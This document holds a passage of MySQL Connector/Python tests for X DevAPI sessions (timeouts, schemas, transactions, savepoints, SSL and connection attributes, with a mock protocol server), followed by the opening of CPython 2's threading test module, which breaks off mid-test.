config["host"] = "127.0.0.1"
config["password"] = "invalid_password"
config["connect-timeout"] = 2000
time_start = time.time()
self.assertRaises(InterfaceError, mysqlx.get_session, config)
time_elapsed = time.time() - time_start
session.close()
if time_elapsed >= config["connect-timeout"]:
self.fail("Trying to establish a connection with a wrong password "
"should not wait for timeout")
# The connection timeout value must be a positive integer
config["connect-timeout"] = -1
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = 10.0983
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = "abc"
self.assertRaises(TypeError, mysqlx.get_session, config)
def test_get_schemas(self):
schema_name = "test_get_schemas"
self.session.create_schema(schema_name)
schemas = self.session.get_schemas()
self.assertIsInstance(schemas, list)
self.assertTrue(schema_name in schemas)
self.session.drop_schema(schema_name)
def test_get_schema(self):
schema = self.session.get_schema(self.schema_name)
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.schema_name)
def test_get_default_schema(self):
schema = self.session.get_default_schema()
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.connect_kwargs["schema"])
self.assertTrue(schema.exists_in_database())
# Test None value is returned if no schema name is specified
settings = self.connect_kwargs.copy()
settings.pop("schema")
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test SQL statements not fully qualified, which must not raise error:
# mysqlx.errors.OperationalError: No database selected
self.session.sql('CREATE DATABASE my_test_schema').execute()
self.session.sql('CREATE TABLE my_test_schema.pets(name VARCHAR(20))'
).execute()
settings = self.connect_kwargs.copy()
settings["schema"] = "my_test_schema"
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(),
"my_test_schema")
result = session.sql('SHOW TABLES').execute().fetch_all()
self.assertEqual("pets", result[0][0])
self.session.sql('DROP DATABASE my_test_schema').execute()
self.assertFalse(schema.exists_in_database())
self.assertRaises(mysqlx.ProgrammingError, session.get_default_schema)
session.close()
# Test without default schema configured at connect time (passing None)
settings = self.connect_kwargs.copy()
settings["schema"] = None
build_uri(**settings)
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test not existing default schema at get_session raise error
settings = self.connect_kwargs.copy()
settings["schema"] = "nonexistent"
self.assertRaises(InterfaceError, mysqlx.get_session, settings)
# Test BUG#28942938: 'ACCESS DENIED' error for unauthorized user tries
# to use the default schema if not exists at get_session
self.session.sql("DROP USER IF EXISTS 'def_schema'@'%'").execute()
self.session.sql("CREATE USER 'def_schema'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
settings = self.connect_kwargs.copy()
settings['user'] = 'def_schema'
settings['password'] = 'test'
settings["schema"] = "nonexistent"
# a) Test with no Granted privileges
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Access denied for this user
self.assertEqual(1044, context.exception.errno)
# Grant privilege to one unrelated schema
self.session.sql("GRANT ALL PRIVILEGES ON nonexistent.* TO "
"'def_schema'@'%'").execute()
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Schema does not exist
self.assertNotEqual(1044, context.exception.errno)
def test_drop_schema(self):
test_schema = 'mysql_session_test_drop_schema'
schema = self.session.create_schema(test_schema)
self.session.drop_schema(test_schema)
self.assertFalse(schema.exists_in_database())
def test_create_schema(self):
schema = self.session.create_schema(self.schema_name)
self.assertTrue(schema.exists_in_database())
def test_sql(self):
statement = self.session.sql("SELECT VERSION()")
self.assertTrue(isinstance(statement, mysqlx.Statement))
# SQL statements should be strings
statement = self.session.sql(123)
self.assertRaises(mysqlx.ProgrammingError, statement.execute)
# Test unicode statements
statement = self.session.sql(u"SELECT VERSION()").execute()
self.assertTrue(isinstance(statement, mysqlx.SqlResult))
def test_rollback(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.rollback()
self.assertEqual(table.count(), 0)
drop_table(schema, table_name)
def test_commit(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.commit()
self.assertEqual(table.count(), 1)
drop_table(schema, table_name)
def test_savepoint(self):
collection_name = "collection_test"
schema = self.session.get_schema(self.schema_name)
# The savepoint name should be a valid string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, 123)
# The savepoint name should not be an empty string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, "")
# The savepoint name should not be a white space
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, " ")
# Invalid rollback savepoint without a started transaction
sp1 = self.session.set_savepoint("sp1")
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp1)
collection = schema.create_collection(collection_name)
self.session.start_transaction()
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
self.assertEqual(1, collection.count())
# Create a savepoint named 'sp2'
sp2 = self.session.set_savepoint("sp2")
self.assertEqual(sp2, "sp2")
collection.add({"_id": "2", "name": "Wilma", "age": 33}).execute()
self.assertEqual(2, collection.count())
# Create a savepoint named 'sp3'
sp3 = self.session.set_savepoint("sp3")
collection.add({"_id": "3", "name": "Betty", "age": 67}).execute()
self.assertEqual(3, collection.count())
# Rollback to 'sp3' savepoint
self.session.rollback_to(sp3)
self.assertEqual(2, collection.count())
# Rollback to 'sp2' savepoint
self.session.rollback_to(sp2)
self.assertEqual(1, collection.count())
# The 'sp3' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp3)
collection.add({"_id": "4", "name": "Barney", "age": 42}).execute()
self.assertEqual(2, collection.count())
# Create an unnamed savepoint
sp4 = self.session.set_savepoint()
collection.add({"_id": "3", "name": "Wilma", "age": 33}).execute()
self.assertEqual(3, collection.count())
# Release unnamed savepoint
self.session.release_savepoint(sp4)
self.assertEqual(3, collection.count())
# The 'sp4' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp4)
self.session.commit()
schema.drop_collection(collection_name)
def test_close(self):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
session.close()
self.assertRaises(mysqlx.OperationalError, schema.exists_in_database)
@unittest.skipIf(sys.version_info < (2, 7, 9), "The support for SSL is "
"not available for Python versions < 2.7.9.")
def test_ssl_connection(self):
config = {}
config.update(self.connect_kwargs)
socket = config.pop("socket")
# Secure by default
session = mysqlx.get_session(config)
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error on setting Client key without Client Certificate
config["ssl-key"] = tests.SSL_KEY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on settings CRL without setting CA Certificate
config["ssl-crl"] = "/dummy/path"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config.pop("ssl-crl")
# Error on setting SSL Mode to disabled with any SSL option
config["ssl-mode"] = "disabled"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on setting SSL Mode to verify_* without ssl_ca
config["ssl-mode"] = "verify_ca"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["ssl-mode"] = "verify_identity"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on SSL Mode set to required with CA set
config["ssl-ca"] = tests.SSL_CA
config["ssl-cert"] = tests.SSL_CERT
config["ssl-mode"] = "required"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Connection with ssl parameters
config["ssl-mode"] = "verify_identity"
session = mysqlx.get_session(config)
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error if ssl-mode=disabled and ssl_* set
extra = [("ssl_mode", "disabled"),
("ssl_ca", "({0})".format(tests.SSL_CA))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Error if invalid ssl-mode
extra = [("ssl_mode", "invalid")]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Parsing SSL Certificates
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA, False)),
("ssl_key", file_uri(tests.SSL_KEY, False)),
("ssl_cert", file_uri(tests.SSL_CERT, False))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA)),
("ssl_key", file_uri(tests.SSL_KEY)),
("ssl_cert", file_uri(tests.SSL_CERT))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
def test_disabled_x_protocol(self):
session = mysqlx.get_session(self.connect_kwargs)
res = session.sql("SHOW VARIABLES WHERE Variable_name = 'port'") \
.execute().fetch_all()
settings = self.connect_kwargs.copy()
settings["port"] = res[0][1] # Lets use the MySQL classic port
session.close()
self.assertRaises(ProgrammingError, mysqlx.get_session, settings)
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_use_pure(self):
settings = self.connect_kwargs.copy()
settings["use-pure"] = False
session = mysqlx.get_session(settings)
self.assertFalse(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb")
session.use_pure = True
self.assertTrue(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb_pure")
# 'use_pure' should be a bool type
self.assertRaises(ProgrammingError, setattr, session, "use_pure", -1)
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 16), "XPlugin not compatible")
def test_connection_attributes(self):
# Validate an error is raised if URL user defined connection attributes
# given in a list are invalid
invalid_conn_attrs = [2, 1.2, "[_='13']", '[_="1"]', '[_=23]', "[_2.3]",
"[_invalid]", "[valid=0,_]", "[valid=0,_nvalid]",
"[_invalid,valid=0]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# are not a list or a bool type
invalid_conn_attrs = ["[incompleteL", "incompleteL]", "A", "invalid",
"_invalid", "2", "2.3", "{}", "{invalid=0}",
"{[invalid=0]}", "_", 2, 0.2]
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# through a connection URL when a name is duplicated
connection_attributes = {
"foo": "bar",
"repeated": "attribute",
"baz": "zoom",
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
uri = "{},repeated=duplicate_attribute]".format(uri[0:-1])
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(uri)
LOGGER.error("InterfaceError not raised while testing "
"uri: {}".format(uri))
self.assertTrue("Duplicate key 'repeated' used in "
"connection-attributes" in context.exception.msg)
# Test error is raised for attribute name starting with '_'
connection_attributes = [
{"foo": "bar", "_baz": "zoom"},
{"_baz": "zoom"},
{"foo": "bar", "_baz": "zoom", "puuuuum": "kaplot"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connect_kwargs: {}".format(connect_kwargs))
self.assertTrue("connection-attributes" in
context.exception.msg)
self.assertTrue("cannot start with '_'" in context.exception.msg)
# Test error is raised for attribute name size exceeds 32 characters
connection_attributes = [
{"foo": "bar", "p{}w".format("o"*31): "kaplot"},
{"p{}w".format("o"*31): "kaplot"},
{"baz": "zoom", "p{}w".format("o"*31): "kaplot", "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 32 characters limit size" in
context.exception.msg)
# Test error is raised for attribute value size exceeds 1024 characters
connection_attributes = [
{"foo": "bar", "pum": "kr{}nk".format("u"*1024)},
{"pum": "kr{}nk".format("u"*1024)},
{"baz": "zoom", "pum": "kr{}nk".format("u"*1024), "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection-attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 1024 characters limit size" in
context.exception.msg)
# Test valid generic values for the connection-attributes on URI
valid_conn_attrs = ["[]", "False", "True", "false", "true", "[valid]",
"[valid=0]", "[valid,valid2=0]", '["_valid=0]',
"[valid2='0']", "[valid=,valid2=0]", "['_valid=0]",
"[[_valid=0]]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for valid_attr in valid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, valid_attr)
mysqlx.get_session(uri_test)
# Test valid generic values when passing a dict with connection data
valid_conn_attrs = [{}, "False", "True", "false", "true", {"valid": ""},
{"valid": None}, {"valid1": 1}, True, False, 1, 0,
[], ['a1=2', 'a3'], {"valid"}, {"foo", "bar"}]
for conn_attr in valid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
mysqlx.get_session(connect_kwargs)
# Test invalid generic values when passing a dict with connection data
invalid_conn_attrs = [{1:"1"}, {1:2}, {"_invalid":""}, {"_": ""},
123, 123.456, None, {"_invalid"}, ['_a1=2',]]
for conn_attr in invalid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
# Validate the user defined attributes are created in the server
# Test user defined connection attributes through a connection URL
connection_attributes = {
"foo": "bar",
"baz": "zoom",
"quash": "",
"puuuuum": "kaplot"
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
# Verify user defined session-connection-attributes are in the server
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
expected_attrs = connection_attributes.copy()
expected_attrs.update({
"_pid": str(os.getpid()),
"_platform": self.platform_arch,
"_source_host": socket.gethostname(),
"_client_name": "mysql-connector-python",
"_client_license": self.client_license,
"_client_version": ".".join([str(x) for x in VERSION[0:3]]),
"_os": self.os_ver
})
# Note that for an empty string "" value the server stores a Null value
expected_attrs["quash"] = "None"
for row in rows:
self.assertEqual(expected_attrs[row.get_string('ATTR_NAME')],
row.get_string('ATTR_VALUE'),
"Attribute {} with value {} differs of {}".format(
row.get_string('ATTR_NAME'),
row.get_string('ATTR_VALUE'),
expected_attrs[row.get_string('ATTR_NAME')]))
# Verify connection-attributes can be skiped to be set on server
# by URI as "connection_attributes"=false
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes="false")
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
self.assertEqual(len(rows), 0, "connection attributes where created "
"while was specified to not do so: {}".format(rows))
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 12), "XPlugin not compatible")
class MySQLxInnitialNoticeTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.settings = {
"user": "root",
"password": "",
"host": "localhost",
"ssl-mode": "disabled",
"use_pure": True
}
def _server_thread(self, host="localhost", port=33061, notice=1):
stream = ServerSocketStream()
stream.start_receive(host, port)
reader_writer = MessageReaderWriter(stream)
protocol = ServerProtocol(reader_writer)
# Read message header
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 4)
# Read payload
_ = stream.read(msg_len - 1)
# send handshake
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
#stream.sendall(b"\x01\x00\x00\x00\x0b")
# send auth start")
protocol.send_auth_continue_server("00000000000000000000")
# Capabilities are not check for ssl-mode: disabled
# Reading auth_continue from client
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 5)
# Read payload
_ = stream.read(msg_len - 1)
# Send auth_ok
protocol.send_auth_ok()
# Read message
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 12)
# Read payload
_ = stream.read(msg_len - 1)
# send empty notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 12 Mysqlx.Resultset.ColumnMetaData
stream.sendall(b"\x31\x00\x00\x00\x0c"
b"\x08\x07\x12\x08\x44\x61\x74\x61\x62\x61\x73"
b"\x65\x1a\x08\x44\x61\x74\x61\x62\x61\x73\x65"
b"\x22\x08\x53\x43\x48\x45\x4d\x41\x54\x41\x2a"
b"\x00\x32\x00\x3a\x03\x64\x65\x66\x40\x4c\x50"
b"\xc0\x01\x58\x10")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 13 Mysqlx.Resultset.Row
stream.sendall(b"\x16\x00\x00\x00\x0d"
b"\x0a\x13\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69"
b"\x6f\x6e\x5f\x73\x63\x68\x65\x6d\x61\x00")
# msg_type: 14 Mysqlx.Resultset.FetchDone
stream.sendall(b"\x01\x00\x00\x00\x0e")
# msg_type: 11 Mysqlx.Notice.Frame
stream.sendall(b"\x0f\x00\x00\x00\x0b\x08\x03\x10\x02\x1a\x08\x08"
b"\x04\x12\x04\x08\x02\x18\x00")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 17 Mysqlx.Sql.StmtExecuteOk
stream.sendall(b"\x01\x00\x00\x00\x11")
# Read message
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 7)
# Read payload
_ = stream.read(msg_len - 1)
stream.sendall(b"\x07\x00\x00\x00\x00\n\x04bye!")
# Close socket
stream.close()
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_initial_empty_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 10
worker1 = Thread(target=self._server_thread, args=[host, port, 1])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
def test_initial_empty_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 20
worker2 = Thread(target=self._server_thread, args=[host, port, 1])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_initial_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 11
worker1 = Thread(target=self._server_thread, args=[host, port, 2])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
def test_initial_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 21
worker2 = Thread(target=self._server_thread, args=[host, port, 2])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
